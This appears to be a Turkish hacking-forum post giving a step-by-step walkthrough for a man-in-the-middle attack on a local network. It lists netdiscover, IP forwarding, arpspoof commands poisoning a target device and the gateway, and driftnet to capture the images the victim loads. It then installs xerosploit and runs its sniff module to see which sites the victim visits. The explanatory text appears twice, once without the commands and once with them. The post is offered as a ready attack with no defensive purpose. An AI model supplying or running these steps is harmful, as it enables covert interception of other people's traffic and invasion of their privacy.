Anarchosa&ByR0L3S4
İlk olarak
yazarak ağdaki cihazların ip adreslerini alıyoru .
192.168.84.130 diyelim çıkan cihazlardan bir tanesi ip adresini kopyalıyoruz
bu arada ben wiriles değil kablo ile bağlandığımdan dolayı bu şekilde anlatcağım siz kendinize göre editlersiniz .
Yeni bir terminal açıyoruz .
Evet ip adresini aldığımız cihaz hangi siteye girerse o sitedeki veriler bize gelcek png formatında .
2.olarak başka bir py uzantılı dosyamız ile sisteme girmeye çalışcağız
ve dosyamızın içerisine giriş yapıyoruz orda python dili ile yazılmış .py uzantılı install adında kurulum dosyası var .
bu dosyayı
yada
sonra
olarak çalıştıroyurz bize kali ubuntu yada parrot diye 2 seçenek sunuyor ben parrot os kullandığımdan dolayı 2 yani parrotu seçiyorum
yazarak giriş yapıyoruz .
yazarak modül seçeneklerimizi görüyoruz scan yapıp taratıyoruz networkümüzü
karşımıza ağımıza bağlı olanların ip adresleri geldi bunlardan saldırı yapcağımızı seçiyoruz ve kopyalıyoruz
ve yapıştırıyoruz sonra entera tıklıyoruz karşımıza saldırı türleri geldi . Ben sniff seçiyorum çünkü cihazın hangi sitelere girdiğini görmek istiyorum
yazıyorum ve enterliyorum gelen seçenekten Y yi seçiyorum ve enterliyorum ve karşıma istediğim şey geldi 
İlk olarak
Kod:
netdiscover
192.168.84.130 diyelim çıkan cihazlardan bir tanesi ip adresini kopyalıyoruz
bu arada ben wiriles değil kablo ile bağlandığımdan dolayı bu şekilde anlatcağım siz kendinize göre editlersiniz .
Kod:
echo 1 > /proc/sys/net/ipv4/ip_forward
Kod:
arpspoof -i eth0 -t 192.168.84.130 192.168.84.1
Kod:
arpspoof -i eth0 -t 192.168.84.1 192.168.84.130
Kod:
drifnet -i eth0
Evet ip adresini aldığımız cihaz hangi siteye girerse o sitedeki veriler bize gelcek png formatında .
2.olarak başka bir py uzantılı dosyamız ile sisteme girmeye çalışcağız
Kod:
git clone https://github.com/LionSec/xerosploit.git
bu dosyayı
Kod:
python install.py
Kod:
chmod +x install.py
Kod:
./install.py
Kod:
xerosploit
Kod:
help
karşımıza ağımıza bağlı olanların ip adresleri geldi bunlardan saldırı yapcağımızı seçiyoruz ve kopyalıyoruz
ve yapıştırıyoruz sonra entera tıklıyoruz karşımıza saldırı türleri geldi . Ben sniff seçiyorum çünkü cihazın hangi sitelere girdiğini görmek istiyorum
Kod:
sniff
Moderatörün son düzenlenenleri: